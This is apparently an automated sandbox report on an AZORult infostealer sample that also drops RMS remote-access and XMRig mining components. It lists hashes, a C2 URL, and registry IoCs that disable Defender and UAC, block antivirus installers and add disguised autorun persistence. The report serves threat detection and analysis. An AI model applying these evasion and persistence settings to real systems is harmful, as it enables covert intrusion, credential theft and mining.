azorult | 3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c

Analysis

max time kernel
175s
max time network
190s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
03-07-2022 04:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Size

10.5MB
MD5

ad490fe7059e40a7f44b27816dddc566
SHA1

91c73a1800787374c0ee2420dd8c9fc096f26f1f
SHA256

3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c
SHA512

e04d1dca51032bacfc7deb7b02723d8b3cb0ad1b9cbcf49c51dc97299f96751d4998c82269ffe2e6ff0e5bf8a0b36cd477da1116274a99ef562e91022411df05

Score

10^/10

azorult rms xmrig aspackv2 discovery evasion infostealer miner persistence rat trojan upx

Malware Config

Extracted

Family

azorult

http://195.245.112.115/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	taskhostw.exe

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms

UAC bypass 3 TTPs 5 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe

Windows security bypass 2 TTPs 1 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	regedit.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x0006000000023163-191.dat	acprotect
behavioral2/files/0x0006000000023164-192.dat	acprotect

Detected Stratum cryptominer command 1 IoCs

Looks to be attempting to contact Stratum mining pool.

miner

pid	Process
4304	MicrosoftHost.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

XMRig Miner Payload 2 IoCs

miner

resource	yara_rule
behavioral2/files/0x000600000002316b-284.dat	xmrig
behavioral2/files/0x000600000002316b-289.dat	xmrig

ASPack v2.12-2.42 9 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral2/files/0x0006000000023161-149.dat	aspack_v212_v242
behavioral2/files/0x0006000000023161-150.dat	aspack_v212_v242
behavioral2/files/0x0006000000023161-167.dat	aspack_v212_v242
behavioral2/files/0x0006000000023161-179.dat	aspack_v212_v242
behavioral2/files/0x0006000000023161-185.dat	aspack_v212_v242
behavioral2/files/0x0006000000023160-193.dat	aspack_v212_v242
behavioral2/files/0x0006000000023160-196.dat	aspack_v212_v242
behavioral2/files/0x0006000000023160-198.dat	aspack_v212_v242
behavioral2/files/0x0006000000023160-271.dat	aspack_v212_v242

Blocks application from running via registry modification 13 IoCs

Adds application to list of disallowed applications.

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Key created	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe

Executes dropped EXE 19 IoCs

pid	Process
2772	wini.exe
2800	sys.exe
3272	winit.exe
4576	rutserv.exe
2544	cheat.exe
604	taskhost.exe
4640	cmd.exe
3804	taskhostw.exe
4032	rutserv.exe
4612	rutserv.exe
1004	rfusclient.exe
1760	rfusclient.exe
2980	R8.exe
2672	winlogon.exe
4296	Process not Found
1904	rfusclient.exe
2772	RDPWInst.exe
2264	RDPWInst.exe
4304	MicrosoftHost.exe

Modifies Windows Firewall 1 TTPs 61 IoCs

evasion

Modify Existing Service

T1031

pid	Process
1452	netsh.exe
1984	netsh.exe
4196	netsh.exe
344	netsh.exe
4560	netsh.exe
1448	netsh.exe
4264	netsh.exe
4244	netsh.exe
4328	netsh.exe
4876	netsh.exe
4732	netsh.exe
4200	netsh.exe
1032	netsh.exe
4084	netsh.exe
2056	netsh.exe
2892	netsh.exe
4192	netsh.exe
5032	netsh.exe
2008	netsh.exe
3536	netsh.exe
3848	netsh.exe
4604	netsh.exe
5016	netsh.exe
4216	netsh.exe
4348	netsh.exe
2216	netsh.exe
2592	netsh.exe
2548	netsh.exe
1964	netsh.exe
2532	netsh.exe
876	netsh.exe
4400	netsh.exe
2400	netsh.exe
1312	netsh.exe
1756	netsh.exe
4988	netsh.exe
908	netsh.exe
4692	netsh.exe
3132	netsh.exe
3792	netsh.exe
2344	netsh.exe
4976	netsh.exe
4380	netsh.exe
800	netsh.exe
3136	netsh.exe
3716	netsh.exe
2376	netsh.exe
2544	netsh.exe
2296	netsh.exe
3472	netsh.exe
3124	netsh.exe
3572	netsh.exe
2416	netsh.exe
4684	netsh.exe
4852	netsh.exe
624	netsh.exe
3556	netsh.exe
2236	netsh.exe
3620	netsh.exe
4320	netsh.exe
2348	netsh.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Sets file to hidden 1 TTPs 3 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
5008	attrib.exe
3272	attrib.exe
4060	attrib.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0006000000023163-191.dat	upx
behavioral2/files/0x0006000000023164-192.dat	upx
behavioral2/files/0x000300000000072f-226.dat	upx
behavioral2/files/0x000300000000072f-227.dat	upx
behavioral2/memory/2672-238-0x0000000000B50000-0x0000000000C3C000-memory.dmp	upx
behavioral2/memory/2672-239-0x0000000000B50000-0x0000000000C3C000-memory.dmp	upx

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	wini.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	R8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	cmd.exe

Loads dropped DLL 1 IoCs

pid	Process
2836	svchost.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4352	icacls.exe
2216	icacls.exe
4244	icacls.exe
1740	icacls.exe
3792	icacls.exe
536	icacls.exe
1452	icacls.exe
1700	icacls.exe
2344	icacls.exe
3484	icacls.exe
4924	icacls.exe
2800	icacls.exe
2604	icacls.exe
3320	icacls.exe
960	icacls.exe
3112	icacls.exe
1436	icacls.exe
4380	icacls.exe
3332	icacls.exe
1904	icacls.exe
5012	icacls.exe
2544	icacls.exe
1312	icacls.exe
4812	icacls.exe
320	icacls.exe
3588	icacls.exe
116	icacls.exe
4108	icacls.exe
1704	icacls.exe
2704	icacls.exe
2852	icacls.exe
1424	icacls.exe
1800	icacls.exe
4288	icacls.exe
2008	icacls.exe
3468	icacls.exe
4152	icacls.exe
424	icacls.exe
4072	icacls.exe
4348	icacls.exe
3308	icacls.exe
4444	icacls.exe
3064	icacls.exe
2164	icacls.exe
4900	icacls.exe
4184	icacls.exe
2820	icacls.exe
1124	icacls.exe
2952	icacls.exe
1736	icacls.exe
3148	icacls.exe
2596	icacls.exe
2340	icacls.exe
4812	icacls.exe
4572	icacls.exe
2548	icacls.exe
3928	icacls.exe
1532	icacls.exe
2348	icacls.exe
2800	icacls.exe
5080	icacls.exe
3132	icacls.exe
4376	icacls.exe
2688	icacls.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	taskhostw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com
41	ip-api.com

Modifies WinLogon 2 TTPs 7 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe

AutoIT Executable 8 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0006000000023162-140.dat	autoit_exe
behavioral2/files/0x0006000000023162-141.dat	autoit_exe
behavioral2/files/0x000600000002316c-165.dat	autoit_exe
behavioral2/files/0x000600000002316c-164.dat	autoit_exe
behavioral2/files/0x000600000002316e-176.dat	autoit_exe
behavioral2/files/0x000600000002316e-175.dat	autoit_exe
behavioral2/memory/2672-238-0x0000000000B50000-0x0000000000C3C000-memory.dmp	autoit_exe
behavioral2/memory/2672-239-0x0000000000B50000-0x0000000000C3C000-memory.dmp	autoit_exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\rfxvmt.dll	RDPWInst.exe

Drops file in Program Files directory 27 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\360	taskhost.exe
File opened for modification	C:\Program Files\Malwarebytes	taskhost.exe
File opened for modification	C:\Program Files\AVAST Software	taskhost.exe
File opened for modification	C:\Program Files (x86)\Panda Security	taskhost.exe
File opened for modification	C:\Program Files\AVG	taskhost.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	taskhost.exe
File created	C:\Program Files\Common Files\System\iexplore.exe	taskhost.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	attrib.exe
File opened for modification	C:\Program Files\SpyHunter	taskhost.exe
File opened for modification	C:\Program Files (x86)\AVG	taskhost.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	taskhost.exe
File opened for modification	C:\Program Files\Kaspersky Lab	taskhost.exe
File opened for modification	C:\Program Files\Enigma Software Group	taskhost.exe
File opened for modification	C:\Program Files\ESET	taskhost.exe
File opened for modification	C:\Program Files\RDP Wrapper	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	taskhost.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	taskhost.exe
File opened for modification	C:\Program Files\COMODO	taskhost.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	taskhost.exe
File opened for modification	C:\Program Files (x86)\Zaxar	taskhost.exe
File opened for modification	C:\Program Files\ByteFence	taskhost.exe
File opened for modification	C:\Program Files (x86)\Cezurity	taskhost.exe
File opened for modification	C:\Program Files\Cezurity	taskhost.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.dll	attrib.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	taskhost.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\boy.exe	taskhost.exe
File created	C:\Windows\svchost.exe	taskhost.exe
File opened for modification	C:\Windows\svchost.exe	taskhost.exe
File opened for modification	C:\Windows\NetworkDistribution	taskhost.exe
File created	C:\Windows\boy.exe	taskhost.exe

Launches sc.exe 23 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4640	sc.exe
2680	sc.exe
2596	sc.exe
5024	sc.exe
5080	sc.exe
2532	sc.exe
3480	sc.exe
4048	sc.exe
4460	sc.exe
4764	sc.exe
5056	sc.exe
708	sc.exe
2068	sc.exe
4536	sc.exe
4692	sc.exe
3156	sc.exe
5092	sc.exe
4880	sc.exe
320	sc.exe
2800	sc.exe
2024	sc.exe
2936	sc.exe
3944	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe

Delays execution with timeout.exe 7 IoCs

evasion

pid	Process
4872	timeout.exe
4512	timeout.exe
1460	timeout.exe
4352	timeout.exe
3888	timeout.exe
2056	timeout.exe
1832	timeout.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
2444	ipconfig.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
2340	taskkill.exe
1144	taskkill.exe
736	taskkill.exe
3488	taskkill.exe

Modifies registry class 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\MIME\Database	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings	cmd.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2	taskhostw.exe

Runs .reg file with regedit 2 IoCs

pid	Process
1964	regedit.exe
4128	regedit.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
3880	3d2a782f7392be8b7941287ddd8641c9d4da84ea5c3e43b9964bb4b6ef904a5c.exe
